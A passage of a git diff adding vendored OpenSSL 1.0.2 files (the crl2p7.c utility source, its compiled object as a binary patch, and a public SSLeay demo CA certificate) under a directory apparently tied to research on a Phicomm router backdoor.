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
Ths`W!-zwujtPJJZ-v9px7xQA(

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/crl2p7.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/crl2p7.c
new file mode 100644
index 0000000..0763817
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/crl2p7.c
@@ -0,0 +1,334 @@
+/* apps/crl2p7.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+/*
+ * This was written by Gordon Chaffee <chaffee@plateau.cs.berkeley.edu> and
+ * donated 'to the cause' along with lots and lots of other fixes to the
+ * library.
+ */
+
+#include <stdio.h>
+#include <string.h>
+#include <sys/types.h>
+#include "apps.h"
+#include <openssl/err.h>
+#include <openssl/evp.h>
+#include <openssl/x509.h>
+#include <openssl/pkcs7.h>
+#include <openssl/pem.h>
+#include <openssl/objects.h>
+
+static int add_certs_from_file(STACK_OF(X509) *stack, char *certfile);
+#undef PROG
+#define PROG    crl2pkcs7_main
+
+/*-
+ * -inform arg  - input format - default PEM (DER or PEM)
+ * -outform arg - output format - default PEM
+ * -in arg      - input file - default stdin
+ * -out arg     - output file - default stdout
+ */
+
+int MAIN(int, char **);
+
+int MAIN(int argc, char **argv)
+{
+    int i, badops = 0;
+    BIO *in = NULL, *out = NULL;
+    int informat, outformat;
+    char *infile, *outfile, *prog, *certfile;
+    PKCS7 *p7 = NULL;
+    PKCS7_SIGNED *p7s = NULL;
+    X509_CRL *crl = NULL;
+    STACK_OF(OPENSSL_STRING) *certflst = NULL;
+    STACK_OF(X509_CRL) *crl_stack = NULL;
+    STACK_OF(X509) *cert_stack = NULL;
+    int ret = 1, nocrl = 0;
+
+    apps_startup();
+
+    if (bio_err == NULL)
+        if ((bio_err = BIO_new(BIO_s_file())) != NULL)
+            BIO_set_fp(bio_err, stderr, BIO_NOCLOSE | BIO_FP_TEXT);
+
+    infile = NULL;
+    outfile = NULL;
+    informat = FORMAT_PEM;
+    outformat = FORMAT_PEM;
+
+    prog = argv[0];
+    argc--;
+    argv++;
+    while (argc >= 1) {
+        if (strcmp(*argv, "-inform") == 0) {
+            if (--argc < 1)
+                goto bad;
+            informat = str2fmt(*(++argv));
+        } else if (strcmp(*argv, "-outform") == 0) {
+            if (--argc < 1)
+                goto bad;
+            outformat = str2fmt(*(++argv));
+        } else if (strcmp(*argv, "-in") == 0) {
+            if (--argc < 1)
+                goto bad;
+            infile = *(++argv);
+        } else if (strcmp(*argv, "-nocrl") == 0) {
+            nocrl = 1;
+        } else if (strcmp(*argv, "-out") == 0) {
+            if (--argc < 1)
+                goto bad;
+            outfile = *(++argv);
+        } else if (strcmp(*argv, "-certfile") == 0) {
+            if (--argc < 1)
+                goto bad;
+            if (!certflst)
+                certflst = sk_OPENSSL_STRING_new_null();
+            if (!certflst)
+                goto end;
+            if (!sk_OPENSSL_STRING_push(certflst, *(++argv))) {
+                sk_OPENSSL_STRING_free(certflst);
+                goto end;
+            }
+        } else {
+            BIO_printf(bio_err, "unknown option %s\n", *argv);
+            badops = 1;
+            break;
+        }
+        argc--;
+        argv++;
+    }
+
+    if (badops) {
+ bad:
+        BIO_printf(bio_err, "%s [options] <infile >outfile\n", prog);
+        BIO_printf(bio_err, "where options are\n");
+        BIO_printf(bio_err, " -inform arg    input format - DER or PEM\n");
+        BIO_printf(bio_err, " -outform arg   output format - DER or PEM\n");
+        BIO_printf(bio_err, " -in arg        input file\n");
+        BIO_printf(bio_err, " -out arg       output file\n");
+        BIO_printf(bio_err,
+                   " -certfile arg  certificates file of chain to a trusted CA\n");
+        BIO_printf(bio_err, "                (can be used more than once)\n");
+        BIO_printf(bio_err,
+                   " -nocrl         no crl to load, just certs from '-certfile'\n");
+        ret = 1;
+        goto end;
+    }
+
+    ERR_load_crypto_strings();
+
+    in = BIO_new(BIO_s_file());
+    out = BIO_new(BIO_s_file());
+    if ((in == NULL) || (out == NULL)) {
+        ERR_print_errors(bio_err);
+        goto end;
+    }
+
+    if (!nocrl) {
+        if (infile == NULL)
+            BIO_set_fp(in, stdin, BIO_NOCLOSE);
+        else {
+            if (BIO_read_filename(in, infile) <= 0) {
+                perror(infile);
+                goto end;
+            }
+        }
+
+        if (informat == FORMAT_ASN1)
+            crl = d2i_X509_CRL_bio(in, NULL);
+        else if (informat == FORMAT_PEM)
+            crl = PEM_read_bio_X509_CRL(in, NULL, NULL, NULL);
+        else {
+            BIO_printf(bio_err, "bad input format specified for input crl\n");
+            goto end;
+        }
+        if (crl == NULL) {
+            BIO_printf(bio_err, "unable to load CRL\n");
+            ERR_print_errors(bio_err);
+            goto end;
+        }
+    }
+
+    if ((p7 = PKCS7_new()) == NULL)
+        goto end;
+    if ((p7s = PKCS7_SIGNED_new()) == NULL)
+        goto end;
+    p7->type = OBJ_nid2obj(NID_pkcs7_signed);
+    p7->d.sign = p7s;
+    p7s->contents->type = OBJ_nid2obj(NID_pkcs7_data);
+
+    if (!ASN1_INTEGER_set(p7s->version, 1))
+        goto end;
+    if ((crl_stack = sk_X509_CRL_new_null()) == NULL)
+        goto end;
+    p7s->crl = crl_stack;
+    if (crl != NULL) {
+        sk_X509_CRL_push(crl_stack, crl);
+        crl = NULL;             /* now part of p7 for OPENSSL_freeing */
+    }
+
+    if ((cert_stack = sk_X509_new_null()) == NULL)
+        goto end;
+    p7s->cert = cert_stack;
+
+    if (certflst)
+        for (i = 0; i < sk_OPENSSL_STRING_num(certflst); i++) {
+            certfile = sk_OPENSSL_STRING_value(certflst, i);
+            if (add_certs_from_file(cert_stack, certfile) < 0) {
+                BIO_printf(bio_err, "error loading certificates\n");
+                ERR_print_errors(bio_err);
+                goto end;
+            }
+        }
+
+    sk_OPENSSL_STRING_free(certflst);
+
+    if (outfile == NULL) {
+        BIO_set_fp(out, stdout, BIO_NOCLOSE);
+#ifdef OPENSSL_SYS_VMS
+        {
+            BIO *tmpbio = BIO_new(BIO_f_linebuffer());
+            out = BIO_push(tmpbio, out);
+        }
+#endif
+    } else {
+        if (BIO_write_filename(out, outfile) <= 0) {
+            perror(outfile);
+            goto end;
+        }
+    }
+
+    if (outformat == FORMAT_ASN1)
+        i = i2d_PKCS7_bio(out, p7);
+    else if (outformat == FORMAT_PEM)
+        i = PEM_write_bio_PKCS7(out, p7);
+    else {
+        BIO_printf(bio_err, "bad output format specified for outfile\n");
+        goto end;
+    }
+    if (!i) {
+        BIO_printf(bio_err, "unable to write pkcs7 object\n");
+        ERR_print_errors(bio_err);
+        goto end;
+    }
+    ret = 0;
+ end:
+    if (in != NULL)
+        BIO_free(in);
+    if (out != NULL)
+        BIO_free_all(out);
+    if (p7 != NULL)
+        PKCS7_free(p7);
+    if (crl != NULL)
+        X509_CRL_free(crl);
+
+    apps_shutdown();
+    OPENSSL_EXIT(ret);
+}
+
+/*-
+ *----------------------------------------------------------------------
+ * int add_certs_from_file
+ *
+ *      Read a list of certificates to be checked from a file.
+ *
+ * Results:
+ *      number of certs added if successful, -1 if not.
+ *----------------------------------------------------------------------
+ */
+static int add_certs_from_file(STACK_OF(X509) *stack, char *certfile)
+{
+    BIO *in = NULL;
+    int count = 0;
+    int ret = -1;
+    STACK_OF(X509_INFO) *sk = NULL;
+    X509_INFO *xi;
+
+    in = BIO_new(BIO_s_file());
+    if ((in == NULL) || (BIO_read_filename(in, certfile) <= 0)) {
+        BIO_printf(bio_err, "error opening the file, %s\n", certfile);
+        goto end;
+    }
+
+    /* This loads from a file, a stack of x509/crl/pkey sets */
+    sk = PEM_X509_INFO_read_bio(in, NULL, NULL, NULL);
+    if (sk == NULL) {
+        BIO_printf(bio_err, "error reading the file, %s\n", certfile);
+        goto end;
+    }
+
+    /* scan over it and pull out the CRL's */
+    while (sk_X509_INFO_num(sk)) {
+        xi = sk_X509_INFO_shift(sk);
+        if (xi->x509 != NULL) {
+            sk_X509_push(stack, xi->x509);
+            xi->x509 = NULL;
+            count++;
+        }
+        X509_INFO_free(xi);
+    }
+
+    ret = count;
+ end:
+    /* never need to OPENSSL_free x */
+    if (in != NULL)
+        BIO_free(in);
+    if (sk != NULL)
+        sk_X509_INFO_free(sk);
+    return (ret);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/crl2p7.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/crl2p7.o
new file mode 100644
index 0000000000000000000000000000000000000000..d1f66b50b8f051bab6c741f7b71d64ea18f255e7
GIT binary patch
literal 8928
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/demoCA/cacert.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/demoCA/cacert.pem
new file mode 100644
index 0000000..affbce3
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/demoCA/cacert.pem
@@ -0,0 +1,14 @@
+subject=/C=AU/SOP=QLD/O=Mincom Pty. Ltd./OU=CS/CN=SSLeay demo server
+issuer= /C=AU/SOP=QLD/O=Mincom Pty. Ltd./OU=CS/CN=CA
+-----BEGIN X509 CERTIFICATE-----
+
+MIIBgjCCASwCAQQwDQYJKoZIhvcNAQEEBQAwODELMAkGA1UEBhMCQVUxDDAKBgNV
+BAgTA1FMRDEbMBkGA1UEAxMSU1NMZWF5L3JzYSB0ZXN0IENBMB4XDTk1MTAwOTIz
+MzIwNVoXDTk4MDcwNTIzMzIwNVowYDELMAkGA1UEBhMCQVUxDDAKBgNVBAgTA1FM
+RDEZMBcGA1UEChMQTWluY29tIFB0eS4gTHRkLjELMAkGA1UECxMCQ1MxGzAZBgNV
+BAMTElNTTGVheSBkZW1vIHNlcnZlcjBcMA0GCSqGSIb3DQEBAQUAA0sAMEgCQQC3
+LCXcScWua0PFLkHBLm2VejqpA1F4RQ8q0VjRiPafjx/Z/aWH3ipdMVvuJGa/wFXb
+/nDFLDlfWp+oCPwhBtVPAgMBAAEwDQYJKoZIhvcNAQEEBQADQQArNFsihWIjBzb0
+DCsU0BvL2bvSwJrPEqFlkDq3F4M6EGutL9axEcANWgbbEdAvNJD1dmEmoWny27Pn
+IMs6ZOZB
+-----END X509 CERTIFICATE-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/demoCA/index.txt b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/demoCA/index.txt
new file mode 100644
index 0000000..2cdd252
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/demoCA/index.txt
@@ -0,0 +1,39 @@
